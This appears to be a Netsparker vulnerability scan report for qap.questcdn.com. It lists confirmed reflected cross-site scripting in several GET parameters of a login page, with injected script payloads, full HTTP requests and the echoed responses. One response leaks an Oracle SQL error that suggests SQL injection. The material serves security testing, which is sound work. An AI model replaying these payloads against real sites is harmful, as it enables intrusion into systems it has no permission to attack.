<tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_login.html
/qap/projects/prj_browse/ipp_login.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | '"--></style></script><script>alert(0x00023C)</script> |
| provider | GET | 453856 |
| jobNo | GET | 1438657 |
| caller | GET | projects/prj_browse/ipp_prj_browse_f.html |
| caller_params | GET | 3 |
Request
GET /qap/projects/prj_browse/ipp_login.html?jobCategoryNo='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00023C)%3C/script%3E&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=3 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:06:17 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:17 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3827
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00023C%29%3C%2Fscript%3E&member_no=&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location ='/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?3"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="'"--></style></script><script>netsparker(0x00023C)</script>"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value="3"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo='"--></style></script><script>netsparker(0x00023C)</script>&jobNo=1438657&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:06:17 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:17 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3827
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00023C%29%3C%2Fscript%3E&member_no=&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location ='/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?3"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="'"--></style></script><script>netsparker(0x00023C)</script>"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value="3"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo='"--></style></script><script>netsparker(0x00023C)</script>&jobNo=1438657&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_login.html
/qap/projects/prj_browse/ipp_login.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 1048445 |
| provider | GET | 453856 |
| jobNo | GET | '"--></style></script><script>alert(0x000266)</script> |
| caller | GET | projects/prj_browse/ipp_prj_browse_f.html |
| caller_params | GET | 3 |
Request
GET /qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000266)%3C/script%3E&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=3 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:06:49 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:49 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7762
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000266%29%3C%2Fscript%3E&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000266%29%3C%2Fscript%3E', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000266%29%3C%2Fscript%3E', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { <font color="#FF0000">2011/03/01 14:06:49.913 [ 1] (TP-Processor1844) Problem including template component SQLLOOP query=" SELECT jt.name FROM jobs j, job_types jt WHERE jt.job_type_no = j.job_type_no AND j.job_no = <?p:jobNo?> " name="jt"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT jt.name FROM jobs j, job_types jt WHERE jt.job_type_no = j.job_type_no AND j.job_no = '"--></style></script><script>netsparker(0x000266)</script> at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000266%29%3C%2Fscript%3E&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?3"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="'"--></style></script><script>netsparker(0x000266)</script>"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value="3"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo='"--></style></script><script>netsparker(0x000266)</script>&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:06:49 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:49 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7762
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000266%29%3C%2Fscript%3E&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000266%29%3C%2Fscript%3E', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000266%29%3C%2Fscript%3E', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { <font color="#FF0000">2011/03/01 14:06:49.913 [ 1] (TP-Processor1844) Problem including template component SQLLOOP query=" SELECT jt.name FROM jobs j, job_types jt WHERE jt.job_type_no = j.job_type_no AND j.job_no = <?p:jobNo?> " name="jt"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT jt.name FROM jobs j, job_types jt WHERE jt.job_type_no = j.job_type_no AND j.job_no = '"--></style></script><script>netsparker(0x000266)</script> at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000266%29%3C%2Fscript%3E&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/projects/prj_browse/ipp_prj_browse_f.html?3"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="'"--></style></script><script>netsparker(0x000266)</script>"> <input type="hidden" name="loginPagePath" value="projects/prj_browse/ipp_prj_browse_f.html"> <input type="hidden" name="loginPageParams" value="3"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td width="185"><a href="/qap/forgotPassword.html">Forgot Password?</a></td> </tr> </table><!-- <p>Not already a member of QuestCDN.com - click <a href="https://secure.questcdn.com/questcdn/subscribe/sub_form.html?root_page=true member_no="<?s:subscriberPK?>" jobCategoryNo="<?p:jobCategoryNo?>" jobNo="<?p:jobNo?>" provider="<?p:provider?>" ">JOIN</a> for your Free membership</p>--><!-- <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true download_type=plan jobCategoryNo=<?p:jobCategoryNo?> jobNo=<?p:jobNo?> member_no=<?s:subscriberPK?> provider=<?p:provider?>"<font color=red size=3 >JOIN</font></a> for your Free membership</p>--> <p>Not already a member of QuestCDN.com - click <a href="https://qap.questcdn.com/qap/subscribe/sub_form.html?root_page=true&download_type=plan&member_no=&jobCategoryNo=1048445&jobNo='"--></style></script><script>netsparker(0x000266)</script>&provider=453856"><font color=red size=3 >JOIN</font></a> for your Free membership</p </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_login.html
/qap/projects/prj_browse/ipp_login.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 1048445 |
| provider | GET | 453856 |
| jobNo | GET | 1438657 |
| caller | GET | '"--></style></script><script>alert(0x00026B)</script> |
| caller_params | GET | 3 |
Request
GET /qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00026B)%3C/script%3E&caller_params=3 HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:06:52 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:58 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3675
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location ='/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'; } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1438657&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td width="100%" height="100%" valign="top"> <div class="crumbtrail"><a href="/ipp/'"--></style></script><script>netsparker(0x00026B)</script>?3"><span class="arrow"><--</span>Return to last page</a></div> <form name="userdata" Action="/qap/action/ippLogin" Method="POST"> <input type="hidden" name="root_page" value="true"> <input type="hidden" name="provider" value="453856"> <input type="hidden" name="jobCategoryNo" value="1048445"> <input type="hidden" name="jobNo" value="1438657"> <input type="hidden" name="loginPagePath" value="'"--></style></script><script>netsparker(0x00026B)</script>"> <input type="hidden" name="loginPageParams" value="3"> <h3>Login</h3> <p>Please use your QuestCDN.com Username & Password to log in:</p> <table width="300"> <tr> <td width="150">username:</td> <td width="150"><input type="text" name="username" size="24"></td> </tr> <tr> <td width="150">password:</td> <td width="150"><input type="password" name="password" size="24"></td> </tr> <tr> <td> </td> <td><input type="submit" value="Login"</input></td> </tr> <tr> <td width="115"></td> <td 